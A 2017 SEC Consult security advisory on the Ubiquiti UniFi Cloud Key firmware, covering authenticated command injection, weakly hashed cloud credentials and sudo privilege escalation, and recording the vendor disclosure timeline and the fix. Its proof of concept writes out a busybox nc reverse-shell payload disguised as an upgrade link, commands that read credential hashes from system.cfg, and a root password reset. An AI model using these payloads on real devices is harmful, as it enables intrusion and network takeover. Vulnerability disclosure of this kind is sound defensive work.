Ubiquiti Networks UniFi Cloud Key Command Injection / Privilege Escalation
Posted on 01 August 2017
SEC Consult Vulnerability Lab Security Advisory < 20170727-0 > ======================================================================= title: Authenticated Command Injection & Cloud User Weak Crypto & Privilege Escalation product: Ubiquiti Networks UniFi Cloud Key vulnerable version: Firmware v0.5.9/0.6.0 fixed version: Firmware v0.6.1 CVE number: impact: Critical homepage: https://www.ubnt.com found: 2017-01-31 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets." Source: http://ir.ubnt.com/ Business recommendation: ------------------------ SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: ----------------------------------- 1) Authenticated Command Injection & Cloud User Weak Crypto The manual UniFi Cloud Key firmware upgrade function is prone to a command injection vulnerability which can be exploited for example by sending a manipulated upgrade link to a victim. A reverse-shell can be used to get access to the device and this allows an attacker to get access to the internal network of the attacked user. The web user is "www-data" which has only few access and execution rights but by exploiting vulnerability 2) it is possible to gain root access on the device! After a successful command injection the cloud user account password hash can be dumped. Since the UniFi Cloud Key has to communicate with the access points and configure their passwords as well, a hash has to be stored at another place than /etc/shadow to persist the keys on the devices. The hashes are stored in "system.cfg" using only MD5 hashing algorithm which can be cracked easily in reasonable time. This configuration file consists the username and the password hash of the cloud user which is the same on all access points and the UniFi Cloud Key. This configuration can be read by the user "www-data". Afterwards, the hash can be cracked and the cloud user is hijacked. A remote-configuration of the wireless lan of the user is now possible for an attacker. 2) Privilege Escalation The password of the root user can be changed by a lower privileged user on the device. This is possible because some binaries can be executed with sudo by this user without the root password. Proof of concept: ----------------- 1) Authenticated Command Injection & Cloud-User Hash Leak The following PHP snipplet is responsible for the command execution: (api.inc, line 476) ------------------------------------------------------------------------------- exec(CMD_WGET . $url . CMD_WGET_OPTIONS, $out, $rc); return CMD_WGET . $url . CMD_WGET_OPTIONS; } [...] ------------------------------------------------------------------------------- The following link opens a reverse-shell: ;busybox nc <Attacker-IP> <Attacker-Port> -e /bin/bash; To 'hide' the command from the eyes of the user in the upgrade window, one can also decorate the link: ;busybox nc 192.168.3.142 8999 -e /bin/bash; https://secconsult.build-1337.bin As listener, netcat was used: $ nc -lvp <Attacker-Port> To hijack the cloud account, steal username and password hash: (user: www-data) $ cd /srv/unifi/data/devices/uap/ $ ls <serial-number-of-an-ap> $ cd <serial-number-of-an-ap> $ cat system.cfg | grep "users.1.name" users.1.name=<username> $ cat system.cfg | grep "users.1.password" users.1.password=<password> The root password hash in /etc/shadow is SHA-512 hashed, but in system.cfg the same password is just MD5 hashed and can be cracked easily in reasonable time. 2) Privilege Escalation Because of the following line in /etc/sudoers.d/cloudkey-webui one can elevate the rights of www-data to root: (cloudkey-webui, line 1) ------------------------------------------------------------------------------- www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, /usr/sbin/service unifi *, /usr/bin/java ------------------------------------------------------------------------------- With the following commands one can change the root password without actually knowing it: (user: www-data) $ cd /tmp $ echo "root:password" > newfile.txt $ /usr/bin/sudo /sbin/ubnt-systool chpasswd < newfile.txt The root password is now changed to 'password'. SSH login is also possible: $ ssh root@<IP-Address> Vulnerable / tested versions: ----------------------------- Ubiquiti Networks UniFi Cloud Key version 0.5.9/0.6.0 has been tested. This version was the latest at the time the security vulnerabilities were discovered. Vendor contact timeline: ------------------------ 2017-02-03: Contacting vendor via HackerOne. 2017-02-05: Providing PoC video via HackerOne. 2017-02-06: Vendor sets status to "Triaged". 2017-02-21: Asking for a status update; No answer. 2017-03-01: Inform the vendor that the advisory will be published at 2017-03-27; No answer. 2017-03-17: Asking for a status update. 2017-03-20: Vendor states that fix will be available in v0.6.1. 2017-03-21: Asking vendor when the update will be available. Found update on vendor homepage (available since 2017-03-20). 2017-03-21: Vendor asks for more time. Set release date to 2017-06-25. 2017-03-27: Fixed version is available - provide at least 90 days for customers to apply the patch. 2017-05-15: Contacted vendor via e-mail and set the publication date to 2017-06-27. 2017-06-26: Shifted publication date back to 2017-07-27 to provide more for customers to apply the patch. 2017-07-27: Public release of security advisory Solution: --------- Upgrade to firmware v0.6.1 or later. Workaround: ----------- None Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF T. Weber / @2017